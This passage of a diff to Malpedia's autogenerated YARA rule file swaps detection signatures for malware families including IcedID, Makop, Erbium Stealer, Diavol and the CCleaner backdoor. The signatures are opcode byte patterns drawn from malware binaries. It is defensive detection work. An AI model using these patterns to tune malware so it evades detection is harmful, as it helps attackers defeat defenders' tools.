-		$sequence_4 = { 8d8809f9ffff b8c94216b2 f7e9 03d1 }
-		$sequence_5 = { 3c10 740c 3c11 7408 3c22 7404 3c30 }
-		$sequence_6 = { 3c11 7408 3c22 7404 }
-		$sequence_7 = { 3c21 7408 3c23 7404 3c24 }
-		$sequence_8 = { 7404 3c58 7507 b802000000 eb02 }
-		$sequence_9 = { 7408 3c23 7404 3c24 }
+		$sequence_0 = { 31d2 90 8a0c16 880c10 42 39d3 }
+		$sequence_1 = { 893424 ff15???????? 57 8b85c8feffff 8d65f4 }
+		$sequence_2 = { 89442408 8b4310 89442404 8d85e0f3ffff 890424 e8???????? }
+		$sequence_3 = { 85c0 0f845a090000 c7442404???????? 891c24 ff15???????? 83ec08 a3???????? }
+		$sequence_4 = { 40 3d00010000 75f4 31ff 31c9 }
+		$sequence_5 = { 890424 ff15???????? 83ec0c 85c0 7504 31c0 }
+		$sequence_6 = { 83ec08 a3???????? 85c0 0f8480070000 c7442404???????? }
+		$sequence_7 = { 29f2 89542404 893c24 e8???????? c745e400000000 }
+		$sequence_8 = { 8b463c 8d1406 895580 8d8406f8000000 0fb74a06 85c9 0f8456020000 }
+		$sequence_9 = { 83ec08 a3???????? 85c0 0f843b0b0000 c7442404???????? 891c24 ff15???????? }
 
 	condition:
-		7 of them and filesize < 801792
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Nvisospit_Auto : FILE
+rule MALPEDIA_Win_Alpc_Lpe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f5c60665-a01a-5768-8a20-3005a0276675"
+		id = "2d2adcb6-f098-569a-bf85-49ff70d8e48c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nvisospit_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alpc_lpe_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "bbf068c3d3b2f73248f6b6d32c9808daec6187590ab8231b3d2dc1fe1f513715"
+		logic_hash = "f41b95cac61aef76c7f2f31b4e9f327d93351cd15a34ca1f25e406b880001510"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123919,32 +124189,32 @@ rule MALPEDIA_Win_Nvisospit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c6857ff9ffff4b 8b45dc 898580f9ffff 8b45e0 66898584f9ffff c7858af9ffff00000000 }
-		$sequence_1 = { 0fb785b4fdffff 0fb7c0 8db5b4fdffff 81c607010000 89742414 8db5b4fdffff 83c606 }
-		$sequence_2 = { c70424e8030000 a1???????? ffd0 83ec04 b800000000 8d65f4 59 }
-		$sequence_3 = { 8d7600 8dbc2700000000 8b06 0fb65e08 8b4e04 8d9000004000 8b8000004000 }
-		$sequence_4 = { 83ea01 83fa05 7707 8b0c9598444000 dd4018 }
-		$sequence_5 = { 7408 83e840 83e0bf 7512 8305????????01 83c430 }
-		$sequence_6 = { 83c008 8b00 8d95a2f9ffff 89542420 8d95a4f9ffff }
-		$sequence_7 = { c7442414ffff0000 c744241000000000 8b55d4 8954240c c7442408???????? }
-		$sequence_8 = { e8???????? c7442404ccffffff c70424???????? e8???????? c7442404d1feffff }
-		$sequence_9 = { 8b442428 8d50fc 83e2fb 7408 83e840 }
+		$sequence_0 = { 57 4883ec28 488d6a20 4533c0 b201 488b8d50010000 e8???????? }
+		$sequence_1 = { 488d0d50830000 33d2 e8???????? 488bf8 4885c0 7507 }
+		$sequence_2 = { e8???????? 4885c0 0f85ce000000 488d15cfa90000 488bcb e8???????? }
+		$sequence_3 = { 488bc1 488b8d18010000 48894c2428 488b8d10010000 48894c2420 4c8b8d08010000 4c8b8500010000 }
+		$sequence_4 = { 48837d0801 770d 48c785f800000001000000 eb0e 488b4508 48ffc8 488985f8000000 }
+		$sequence_5 = { 90 488d4d08 e8???????? 0fb685c4020000 488bf8 488d4dd0 488d15f3d40000 }
+		$sequence_6 = { 4c8d05cbfa0000 488d1574fb0000 488d0d95fb0000 ff15???????? 486b856801000010 }
+		$sequence_7 = { 488bd0 488d4d04 e8???????? 488b8d00010000 }
+		$sequence_8 = { 488b8d20010000 e8???????? 488b8d28010000 488d0448 48894508 488b8d20010000 }
+		$sequence_9 = { 4c8d4dbf 33d2 4c8d05cc7e0000 488bcf ffd3 85c0 }
 
 	condition:
-		7 of them and filesize < 66560
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Mmon_Auto : FILE
+rule MALPEDIA_Win_Erbium_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b18c07bb-08ed-5694-944e-153520890ae8"
+		id = "3a53e6ef-1078-5435-9f60-4f8ff6596d6b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mmon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mmon_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.erbium_stealer_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "0a47221b764bce60b9ce9e11d4cf6ad81a3b7814241076d22b6772dafdc7fe22"
+		logic_hash = "bccad5f3f8af9dfd7831cb14cdc529eb8f240bee1d54dd0908880ec160a26124"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123958,32 +124228,32 @@ rule MALPEDIA_Win_Mmon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4710 3bc8 770d 83c8ff }
-		$sequence_1 = { 8d48f3 83f906 0f878b000000 8d70ff 33db 33ff 83feff }
-		$sequence_2 = { 51 6800040000 50 6a00 6800130000 ff15???????? 8b45b4 }
-		$sequence_3 = { 68???????? 56 897dfc 89bd4cffffff 898d50ffffff }
-		$sequence_4 = { 68???????? c684247810000001 e8???????? 83c40c 50 }
-		$sequence_5 = { c1f905 8b0c8d606a4200 c1e006 0fbe440104 83e040 5d c3 }
-		$sequence_6 = { 7303 8d4594 8b8d54ffffff 6a20 51 }
-		$sequence_7 = { 8b4710 3bc8 770d 83c8ff 8bf7 e8???????? }
-		$sequence_8 = { 8d4fe2 83e81e 898d54ffffff 898548ffffff bb08000000 0fb707 83f830 }
-		$sequence_9 = { 8b0d???????? 8bd6 2bd0 52 51 50 53 }
+		$sequence_0 = { 66833800 75f7 668b4c2450 6685c9 7418 }
+		$sequence_1 = { 8b4db8 83c102 51 8b55d0 52 }
+		$sequence_2 = { 50 8b4dec 8b55f8 03510c }
+		$sequence_3 = { 83c208 8955e0 c745dc00000000 eb12 8b45dc }
+		$sequence_4 = { 0f1f4000 8a10 0fbef2 80ea41 8bce }
+		$sequence_5 = { 894588 89458c 894590 6a00 6a18 8d8d7cffffff }
+		$sequence_6 = { 52 ff55fc 32c0 e9???????? 6a00 6800100000 68???????? }
+		$sequence_7 = { 68???????? 8b4df4 51 ff15???????? 8945ac 68???????? 8b55f4 }
+		$sequence_8 = { 660f1f440000 40 80b84820400000 75f6 51 }
+		$sequence_9 = { 85c0 753d 6800800000 6a00 8b55f8 52 8b4508 }
 
 	condition:
-		7 of them and filesize < 356352
+		7 of them and filesize < 33792
 }
-rule MALPEDIA_Win_Unidentified_001_Auto : FILE
+rule MALPEDIA_Win_Neutrino_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2b4764d2-9d12-5e82-8bd8-6d5008485440"
+		id = "7a087fc7-82b2-5ab1-84ba-f1736b808b97"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_001_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.neutrino_pos_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "81eac2ebab9009f83937098bc70d4667382c46b0593ed411973170676729479d"
+		logic_hash = "018a5236bd48798fd0b76750c3d5d4efe90b9a49b4a1a51163482fa226bfcefe"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123997,32 +124267,32 @@ rule MALPEDIA_Win_Unidentified_001_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 741c 83e80a 0f84c6fcffff 2def000000 }
-		$sequence_1 = { 8d85d4fdffff 50 56 e8???????? 85c0 75da 32c0 }
-		$sequence_2 = { 832600 ff7508 e8???????? 85c0 7d0d 3d02400080 7406 }
-		$sequence_3 = { 56 ff5078 85c0 7d0c 68???????? 56 50 }
-		$sequence_4 = { 8b4d10 85c9 7405 e8???????? 8bc6 5e c9 }
-		$sequence_5 = { 8bec 83ec34 53 56 57 6800040000 6a00 }
-		$sequence_6 = { 57 e8???????? 8d45d4 50 6a07 57 }
-		$sequence_7 = { 0f8468feffff 3d4b475a00 0f845dfeffff 3d4d4f5a00 0f8507f9ffff 8325????????00 e9???????? }
-		$sequence_8 = { 0f85ebfcffff c705????????13000000 e9???????? c705????????06000000 e9???????? }
-		$sequence_9 = { 3bc1 7767 74d3 2d434d5200 }
+		$sequence_0 = { 5b 6a72 66895d82 5b 6a73 66895d84 8bd8 }
+		$sequence_1 = { 6a69 6689bd74ffffff 5f 6a63 8bdf 66899d76ffffff }
+		$sequence_2 = { ff7508 ffd0 85c0 7523 6840bbd2e3 53 e8???????? }
+		$sequence_3 = { 66898564ffffff 58 6a65 66898566ffffff }
+		$sequence_4 = { 6689855cffffff 6689855effffff 58 6a64 66898560ffffff 58 6a73 }
+		$sequence_5 = { 83f84d 7707 ebe5 83f84d 760b 83f85a 7706 }
+		$sequence_6 = { 8d4df8 51 6a08 56 ffd0 85c0 0f84b7000000 }
+		$sequence_7 = { 56 ffd0 837dfc00 5e 0f95c0 c9 c3 }
+		$sequence_8 = { 6881874190 6a01 e8???????? 59 59 ff7508 ffd0 }
+		$sequence_9 = { 6a72 668945a0 58 6a07 668945a2 58 66894d9a }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Makop_Auto : FILE
+rule MALPEDIA_Win_Cmsbrute_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55bb2009-0773-50d3-bf67-d639c1dcecf4"
+		id = "da0817c1-f424-5734-8385-f31d5907ea91"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.makop_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cmsbrute_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "15bd73a7e0423413ca2025ecc2d41d366425fcba5c6c678e6bdd7d61fffbeff6"
+		logic_hash = "d6f710add367d46059e77fa037926a5f1978933090d5b5fe00daae5ae1015f3d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124036,34 +124306,34 @@ rule MALPEDIA_Win_Makop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d4c2414 51 a3???????? }
-		$sequence_1 = { ff15???????? 32c0 83c40c c3 837c240400 741f 8b0424 }
-		$sequence_2 = { 8d442414 50 51 6a00 6a00 57 }
-		$sequence_3 = { 7f06 0f84e6000000 f644241010 7432 }
-		$sequence_4 = { 85c0 5d 0f8596030000 8b0d???????? 50 68ef030000 51 }
-		$sequence_5 = { 897d00 7e54 8bc6 8a08 }
-		$sequence_6 = { 6a00 89542430 8b964c080000 55 89442430 }
-		$sequence_7 = { 8bcb 51 8b8c244c010000 52 50 51 e8???????? }
-		$sequence_8 = { 0f8462010000 8b4d0c 8b7d08 8d442414 50 51 6a00 }
-		$sequence_9 = { bf0d000000 be0a000000 668944241e 6689442430 6689442438 6689442446 }
+		$sequence_0 = { ff7518 6a00 6a00 ff75f0 57 56 e8???????? }
+		$sequence_1 = { eb0e 85c0 740f 6835010000 53 6a09 6a06 }
+		$sequence_2 = { ff74241c e8???????? 8b44242c 8b4018 8b00 8b10 6a00 }
+		$sequence_3 = { f742fc00040000 8b4d10 53 56 57 8bd8 7568 }
+		$sequence_4 = { eb1b 8b866c040000 8945dc 8b8670040000 8b5ddc 8945e4 8b8674040000 }
+		$sequence_5 = { ffb540ffffff 56 e8???????? 8b5718 83c40c 898558ffffff 85d2 }
+		$sequence_6 = { e9???????? 8bf3 e8???????? ff75fc ebe6 8b4704 85c0 }
+		$sequence_7 = { eb2d 3bd7 7509 397b10 0f8433ffffff 89bdf4fbffff 89b5d8fbffff }
+		$sequence_8 = { f6471801 7411 e8???????? 4b 4e e8???????? a1???????? }
+		$sequence_9 = { e9???????? f7870001000000000020 740a e8???????? e9???????? 6a32 6a02 }
 
 	condition:
-		7 of them and filesize < 107520
+		7 of them and filesize < 5275648
 }
-rule MALPEDIA_Win_Icedid_Auto : FILE
+rule MALPEDIA_Win_Rhttpctrl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68e0204c-83cb-5a2b-b638-0e50311a0431"
+		id = "bb8327a4-6882-545f-b20a-98b7f136eb51"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.icedid_auto.yar#L1-L292"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rhttpctrl_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "e8c9e17a917aa63cbf96d9c82905a16b279179aa1e4dde7e0caa78f60904db7b"
+		logic_hash = "a8b0cf895e0bd3f2af68f83e9a4ca3cd7018abded67cb45f683d7384d581104e"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -124075,54 +124345,32 @@ rule MALPEDIA_Win_Icedid_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85ff 7418 c60700 47 57 ff15???????? }
-		$sequence_1 = { 6905????????e8030000 50 ff35???????? ff15???????? }
-		$sequence_2 = { 740c 50 ff15???????? 33c0 40 eb11 }
-		$sequence_3 = { ff15???????? 8bf7 8bc6 eb02 33c0 }
-		$sequence_4 = { 0fb605???????? 0fb60d???????? 50 0fb605???????? 50 0fb605???????? 50 }
-		$sequence_5 = { 7413 ff36 6a08 ff15???????? 50 ff15???????? }
-		$sequence_6 = { ff15???????? 85c0 7420 837c241000 }
-		$sequence_7 = { 7427 6a3b 56 ff15???????? }
-		$sequence_8 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 }
-		$sequence_9 = { 8b542414 0302 833800 759f }
-		$sequence_10 = { 47 83c302 3bfd 72c4 8b542414 0302 }
-		$sequence_11 = { 8b12 85d2 7454 8d6af8 d1ed 6a00 5f }
-		$sequence_12 = { 83c414 47 3b7820 72d1 }
-		$sequence_13 = { 3b7820 72d1 5b 33c0 40 5f }
-		$sequence_14 = { 0fb713 8954241c 66c16c241c0c 0fb7d2 }
-		$sequence_15 = { 8d4508 50 0fb6440b34 50 }
-		$sequence_16 = { a808 75f5 a804 7406 }
-		$sequence_17 = { ff15???????? 85c0 750a b8010000c0 e9???????? }
-		$sequence_18 = { ff5010 85c0 7407 33c0 }
-		$sequence_19 = { 85c9 7408 48 8b03 }
-		$sequence_20 = { ff15???????? 4d 85ff 7414 ff15???????? }
-		$sequence_21 = { 33c0 c74424200e000f00 4c 8d486b ff5018 85c0 7593 }
-		$sequence_22 = { 8b442420 48 8b4c2428 8a09 }
-		$sequence_23 = { 8b44480c 8b0c48 48 034f10 48 035728 ff15???????? }
-		$sequence_24 = { ff15???????? 488d5702 488bce ff15???????? }
-		$sequence_25 = { 44334c2440 48897c2438 4885ff 746b }
-		$sequence_26 = { ff15???????? 8bf8 85c0 7409 8b4c2478 }
-		$sequence_27 = { 7506 ff15???????? 80bb8000000040 0f8577ffffff }
-		$sequence_28 = { 7409 8b4c2478 493b0e 741e }
-		$sequence_29 = { 488bf0 4885c0 750d ff15???????? 33c0 e9???????? 8bd7 }
-		$sequence_30 = { 488bb590020000 488b7c2438 33c9 33d2 4885ff 7411 }
-		$sequence_31 = { 4883ec40 33ff 4d8bf0 482178d8 4c8bfa }
+		$sequence_0 = { d1fe 6a55 ff34f5c0d54100 ff7508 e8???????? 83c40c 85c0 }
+		$sequence_1 = { c645f401 ff15???????? 6a00 6a00 }
+		$sequence_2 = { c78424d901000000000000 8d8424e0010000 660fd68424d1010000 0f118424c1010000 6800040000 50 66c78424e50100000000 }
+		$sequence_3 = { 6a2b 68???????? 57 e8???????? 83c40c 8d85f8feffff 8d772b }
+		$sequence_4 = { ff248545924000 8bce e8???????? eb45 834e28ff 895e24 }
+		$sequence_5 = { 68???????? e8???????? 83c408 895f08 837f1400 c7471001000000 }
+		$sequence_6 = { b824280000 e8???????? a1???????? 33c5 8945f0 53 56 }
+		$sequence_7 = { ffb5d8d7ffff ffd6 ffb5d4d7ffff ffd6 8d8ddcd7ffff }
+		$sequence_8 = { 33d2 8b08 85c9 7407 }
+		$sequence_9 = { ffb5e4d7ffff ffb5e0d7ffff 50 ff15???????? 8bc8 898dd8d7ffff 85c9 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 339968
 }
-rule MALPEDIA_Win_Pslogger_Auto : FILE
+rule MALPEDIA_Win_Goopic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ec7a19b3-c3a5-5a75-ac86-d0beb1e4cdd5"
+		id = "46e7b93a-a824-528f-bd94-0b2f369fa2ff"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pslogger_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.goopic_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "746d33059662814e87cdaa4caa4e5b548a478a0041425137f661e51552f006fa"
+		logic_hash = "84ac631e9a300a568150cf088c579ef5611f1aa361740898f3a2d1d9e24582a8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124136,38 +124384,32 @@ rule MALPEDIA_Win_Pslogger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc8 e8???????? 85c0 743b 4863f0 488bce e8???????? }
-		$sequence_1 = { e8???????? e9???????? 4c8bc5 33d2 488bc8 e8???????? 4c8bc6 }
-		$sequence_2 = { e8???????? 488d8c2480030000 e8???????? 488d542420 }
-		$sequence_3 = { 488bc8 e8???????? 8bc8 e8???????? 4863f0 85c0 750d }
-		$sequence_4 = { 488b05???????? 4833c4 4889842488000000 498bf9 498bd8 }
-		$sequence_5 = { 488bf9 483b5908 7418 488b0b 4885c9 }
-		$sequence_6 = { 7406 ff15???????? 48891e 488bd3 488bcf ff15???????? }
-		$sequence_7 = { 4883ec28 803d????????00 7511 0f1f00 e8???????? 803d????????00 }
-		$sequence_8 = { 50 e8???????? 83c40c e9???????? 8d46cf }
-		$sequence_9 = { c745e0284f4200 e9???????? c745e0244f4200 eba2 894ddc c745e0244f4200 }
-		$sequence_10 = { 0f82a6000000 83be78af060000 0f8499000000 6800800000 8d86702f0200 }
-		$sequence_11 = { 0f8544ffffff 56 ff15???????? 8b8c246c040000 5f }
-		$sequence_12 = { 0f83af000000 8bde c1fb06 8bc6 83e03f }
-		$sequence_13 = { e8???????? 8bd8 83c424 85db 0f84ef000000 8bce 8d5102 }
-		$sequence_14 = { 32d2 85db 746c 85c9 756c 8b742420 }
-		$sequence_15 = { 6bd830 56 8b048d88b14200 57 }
+		$sequence_0 = { ff5158 8b442410 ff742430 50 8b08 }
+		$sequence_1 = { 68???????? ff15???????? 8d85f8f7ffff 50 6a02 }
+		$sequence_2 = { ff15???????? 83bdf0efffff00 7409 83bdf8efffff00 77a4 }
+		$sequence_3 = { 751d 6683bdfcfeffff37 7513 b801000000 8b4dfc 33cd }
+		$sequence_4 = { 8945fc 57 6a52 6a40 ff15???????? 8bf8 }
+		$sequence_5 = { 68???????? 8d85fcf7ffff 50 ff15???????? 6a02 68???????? ff15???????? }
+		$sequence_6 = { 744b 83f873 7446 83f874 }
+		$sequence_7 = { 8d4910 660f70c000 83c004 660ffec1 f30f7f41f0 3d00010000 7ce1 }
+		$sequence_8 = { 7cb2 33ff 397d08 766e 41 81e1ff000080 }
+		$sequence_9 = { a3???????? 85c0 750a ff742424 ff15???????? }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Nemim_Auto : FILE
+rule MALPEDIA_Win_Diavol_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "23401018-c6d9-5370-9496-23a34b1b2310"
+		id = "ced056a0-d7eb-5608-bc7f-4327dfcdc8b3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nemim_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.diavol_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "a74c5cc417011139586470805b653eee06eb07d9c80d556280876db9d2f1564f"
+		logic_hash = "3e39473296ffc516b0ed9d4653cc00f465f30bb27ef43ae2429115fd3af11eb5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124181,32 +124423,32 @@ rule MALPEDIA_Win_Nemim_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1f905 8d04c0 be00800000 8b0c8d40604300 }
-		$sequence_1 = { 6a00 6a00 52 6801000080 ff15???????? 85c0 753f }
-		$sequence_2 = { 743a 8b9c243c010000 8b2d???????? 8d4c2434 53 51 ffd5 }
-		$sequence_3 = { 56 57 55 8b0c8504744300 }
-		$sequence_4 = { 68???????? 68???????? e8???????? 8bf8 83c408 85ff 0f84a2000000 }
-		$sequence_5 = { 8856fd 884eff 8b4c2414 c60600 }
-		$sequence_6 = { 57 8b7c2410 b856555555 8d0cbd00000000 f7e9 }
-		$sequence_7 = { 8bc5 c1e005 ff90d0a74200 83c414 8bf8 83ff01 754b }
-		$sequence_8 = { 8d058c5e4300 83780800 754e b741 }
-		$sequence_9 = { 68???????? 53 ff15???????? 6a5c 68???????? }
+		$sequence_0 = { 7532 8b85d0fbffff 50 6a00 6a01 ff15???????? 8bf0 }
+		$sequence_1 = { 32d2 eb16 83f975 7207 8945fc 8bd8 eb0a }
+		$sequence_2 = { 0fb7045e 83c40c 83f825 7416 8d8dfcfeffff }
+		$sequence_3 = { 741d 83f93f 7412 66837dfc2a }
+		$sequence_4 = { 57 e8???????? 8b4dfc 83c410 8bc7 5f 5e }
+		$sequence_5 = { ff15???????? 8bf0 89b5c0fbffff 83feff }
+		$sequence_6 = { e8???????? 83c40c 8b4dfc 5f 5e 33cd b001 }
+		$sequence_7 = { 33c0 85ff 7420 8b0d???????? 8bff 66833c413b }
+		$sequence_8 = { 85c0 0f8465ffffff 8d95f4efffff 2bd6 f685a4edffff10 8bc6 }
+		$sequence_9 = { 8945fc 6880000000 8d8578ffffff 6a00 50 }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 191488
 }
-rule MALPEDIA_Win_Artra_Auto : FILE
+rule MALPEDIA_Win_Ccleaner_Backdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff75386e-794e-5ca3-b572-9b037a957102"
+		id = "d39b3ad8-e53b-51c7-9c43-1241d438c62d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.artra_auto.yar#L1-L262"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ccleaner_backdoor_auto.yar#L1-L273"
 		license_url = "N/A"
-		logic_hash = "0d6b75a232d52a887969f43b5d876701bc36067b1aa62db809423e4fc76fc56c"
+		logic_hash = "7e02daa93489db738904f39e35741a7860a222dd47acd23737d3bf7b398eab73"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -124220,48 +124462,52 @@ rule MALPEDIA_Win_Artra_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b442410 5f 5e 83c41c c21000 5f 33c0 }
-		$sequence_1 = { 5f 8a08 40 84c9 75f9 2bc2 880c30 }
-		$sequence_2 = { 72e3 8bc6 8d5001 5f 8a08 40 }
-		$sequence_3 = { 84d2 75f9 2bc7 3bc8 72e3 8bc6 8d5001 }
-		$sequence_4 = { 51 8bc6 57 33c9 8d7801 8da42400000000 8a10 }
-		$sequence_5 = { 800431f3 8bc6 41 8d7801 }
-		$sequence_6 = { c6042e00 e8???????? 8b542414 83c404 52 892d???????? 893d???????? }
-		$sequence_7 = { 6a00 8d442414 50 ffd7 85c0 }
-		$sequence_8 = { 8d54241c 52 ffd7 85c0 75cc 5d 5b }
-		$sequence_9 = { 55 8b2d???????? 90 8b542410 8d4c2410 }
-		$sequence_10 = { 85c0 7445 53 8b1d???????? 55 8b2d???????? }
-		$sequence_11 = { 8bb424b0000000 33db 895c2408 85f6 0f84a9000000 391e 0f85a1000000 }
-		$sequence_12 = { e8???????? 8b4c242c 8b442418 8d542414 83fafc 7418 83f910 }
-		$sequence_13 = { 40 42 84c9 75f6 e8???????? }
-		$sequence_14 = { 0f8488000000 6a00 57 ff15???????? 57 }
-		$sequence_15 = { 2bc2 03fb 8a4f01 47 }
-		$sequence_16 = { ff15???????? 57 ff15???????? 6a6d 56 ff15???????? 8bf0 }
-		$sequence_17 = { 8bf8 85ff 0f8488000000 6a00 }
-		$sequence_18 = { 51 c7442424ff030000 ff15???????? 8b542408 }
-		$sequence_19 = { b8???????? c6042f00 8d5001 8da42400000000 8a08 }
-		$sequence_20 = { c605????????00 b9???????? b8???????? 8a10 3a11 751a }
-		$sequence_21 = { 6a00 8d45f8 50 8d34fd4c114100 ff36 e8???????? 59 }
-		$sequence_22 = { 83e61f c1e606 033485e03b4100 8b45e4 }
-		$sequence_23 = { ff15???????? 6a00 ff15???????? 5f 33c0 }
-		$sequence_24 = { 75f9 2bc2 8b542428 50 68???????? }
-		$sequence_25 = { 6a00 6a00 68???????? 6801000080 ff15???????? 8d4c2428 51 }
+		$sequence_0 = { 57 ffd6 50 ff15???????? 8b3d???????? 59 ffd7 }
+		$sequence_1 = { 750a b857000780 e9???????? e8???????? }
+		$sequence_2 = { 6a10 50 c785fcfdffff1c7bae7b c78500feffff5c5aae93 }
+		$sequence_3 = { 00cc cc 4883ec28 488b11 }
+		$sequence_4 = { eb03 8b5d0c 8a41fe 83e003 }
+		$sequence_5 = { 013d???????? 8b04b5d8970210 0500080000 3bc8 }
+		$sequence_6 = { 01cc cc 48895c2408 57 }
+		$sequence_7 = { c746182cc60210 eb28 83f8fc 7426 }
+		$sequence_8 = { 01442418 03c8 8954242c 8b542470 }
+		$sequence_9 = { 48 83f808 0f8ceafeffff eb12 }
+		$sequence_10 = { 01442424 eb30 8b4508 897518 }
+		$sequence_11 = { 01461c 8b542424 85d2 7405 }
+		$sequence_12 = { 00cc cc 4057 4883ec50 4533db }
